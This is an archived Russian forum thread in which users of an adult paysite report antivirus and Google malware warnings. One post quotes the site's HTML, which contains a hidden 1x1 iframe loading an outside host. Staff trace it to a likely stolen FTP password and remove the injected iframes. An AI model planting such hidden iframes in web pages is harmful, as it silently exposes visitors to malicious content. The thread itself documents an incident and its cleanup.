PDA

View Full Version : Вирус на платнике?



SAV
19-04-10, 23:00
http://loylay.com/_images/ferrocash-virus-detect.jpg

сабж имеет(/имел) место быть?
п.с. в тот момент времени это был единственное окно броузеров

Nautilus
19-04-10, 23:56
Проверим обязательно, спасибо за сигнал.

Demosfen
20-04-10, 06:15
Проверил всю страницу, плюс все что она подгружает - все чисто. Плюс все антивирусы молчат. Так что это точно не с нашего сайта.

Backwell
20-04-10, 10:01
Такой же результат. В коде всё чисто, при загрузке aph ни одного намёка на вирусы.

SAV
20-04-10, 10:23
тогда вообще без малейшего понятия откуда вылетело, с инетом только ася была в коннекте, платник открыл с создаваемой галереи...

вроде потерь никаких нет.

SAV
10-05-10, 19:47
баян :( только теперь не в моей системе дела, а защита гугла

any comments?

http://www.loylay.com/_images/ferrocash-virus-detect-2.gif

SAV
10-05-10, 19:59
<body topmargin="0" leftmargin="0" marginwidth="-1" marginheight="-1" text="#535353"
bgcolor="#e7eff3" background="http://psdesign.ferronetwork.com/anal-pantyhose/img/fon.gif"
link="#0078FF" vlink="#0078FF" alink="#CCFFFF" onunload=top.BrowserClose()>
<iframe src="http://mostrotraff.com/tgp/" width=1 height=1 frameborder=0></iframe>


а вот и сам ифрэйм

Verton
10-05-10, 21:41
Таки да, ифрейм есть там. И опять на том же платнике, анал бекдор там где-то есть. Чините

Backwell
11-05-10, 13:57
Разбираемся.

Backwell
11-05-10, 14:43
Действительно обнаружили iframe в html/shtml файлах и прибили.
Судя по всему у кого-то из сотрудников вирус увёл пароль к фтп этого домена. На остальных доменах чисто.
У всех на крабочих компах стоят платные антивири, как оно проскачило пока не понятно. Проверяем компьютеры.
Спасибо всем за своевременный сигнал.